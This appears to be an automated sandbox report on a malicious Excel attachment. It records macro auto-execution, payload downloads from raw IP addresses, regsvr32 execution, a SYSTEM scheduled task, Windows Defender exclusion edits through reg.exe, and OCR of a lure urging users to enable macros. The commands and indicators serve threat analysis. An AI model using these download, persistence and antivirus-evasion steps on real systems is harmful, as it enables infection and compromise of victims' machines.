
Windows Analysis Report Compensation-1730406737-09272021.xls

Overview

General Information

Sample Name: Compensation-1730406737-09272021.xls
Analysis ID: 491509
MD5: b4b3a2223765ac84c9b1b05dbf7c6503
SHA1: 57bc35cb0c7a9ac6e7fcb5dea5c211fe5eda5fe0
SHA256: 3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36
Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2528 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2084 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1928 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2008 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 264 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 584 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2228 cmdline: -silent ..\Drezd1.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2608 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 2280 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2624 cmdline: -silent ..\Drezd2.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 408 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • regsvr32.exe (PID: 804 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • regsvr32.exe (PID: 2816 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1124 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2540 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 672 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2064 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2624 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Compensation-1730406737-09272021.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security
Strings: -

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started
    Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
    Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2528, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 2084

    Sigma detected: Regsvr32 Command Line Without DLL
    Source: Process started
    Author: Florian Roth
    Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2084, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 1928

    Persistence and Installation Behavior:

    Sigma detected: Schedule system process
    Source: Process started
    Author: Joe Security
    Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2008, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05, ProcessId: 264

    Jbx Signature Overview

    AV Detection:

    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat | Joe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.422309790.00000000027B1000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_0008AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    Document exploit detected (drops PE files)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 44466.7022844907[1].dat.0.dr
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:09 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:11 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: same bytes as in the 14:51:09 response above (MZ/PE header of 44466.7022844907.dat)
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 14:51:12 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7022844907.dat"
      Data Raw: same bytes as in the 14:51:09 response above (MZ/PE header of 44466.7022844907.dat)
    Source: global traffic | HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.178
      Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1 with the same request headers as above, except Host: 185.183.96.67
    Source: global traffic | HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1 with the same request headers as above, except Host: 185.250.148.213
    Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.178 (this event is logged 50 times in the report)
    Source: regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.422807773.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.420832394.0000000001BC0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.433067223.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.430171202.0000000000950000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000002.433161953.0000000002190000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4 | Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
    Source: Screenshot number: 4 | Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
    Source: Screenshot number: 4 | Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
    Source: Document image extraction number: 0 | Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0 | Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0 | Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1 | Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1 | Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1 | Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Office process drops PE file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd2.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat
    PE file has nameless sections
    Source: 44466.7022844907[1].dat.0.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: Drezd.red.0.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: 44466.7022844907[2].dat.0.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: Drezd1.red.0.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: 44466.7022844907[3].dat.0.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: Drezd2.red.0.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: Drezd.red.5.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: Drezd1.red.10.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: Drezd.red.15.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: Drezd2.red.17.dr | Static PE information: section name: (empty; reported for 3 sections)
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02833726
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02831424
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0283242A
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02832C41
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02831000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02831D89
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02834495
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0283B114
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02831827
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_028334DA
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02831C5D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02834162
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_028332EB
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02833073
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00094FC0
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D82C41
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D8242A
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D81424
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D83726
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D834DA
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D81C5D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D83073
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D832EB
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D84162
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D8B114
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D84495
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D81D89
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D81000
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D81827
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00094FC0
    Source: Compensation-1730406737-09272021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Compensation-1730406737-09272021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Compensation-1730406737-09272021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Compensation-1730406737-09272021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: Drezd.red.5.drStatic PE information: No import functions for PE file found
    Source: Drezd1.red.10.drStatic PE information: No import functions for PE file found
    Source: Drezd2.red.17.drStatic PE information: No import functions for PE file found
    Source: Drezd.red.15.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
    Source: Compensation-1730406737-09272021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................D.-..........&W.....(.P.............................U.................................................................-.....
    Source: C:\Windows\System32\reg.exeConsole Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
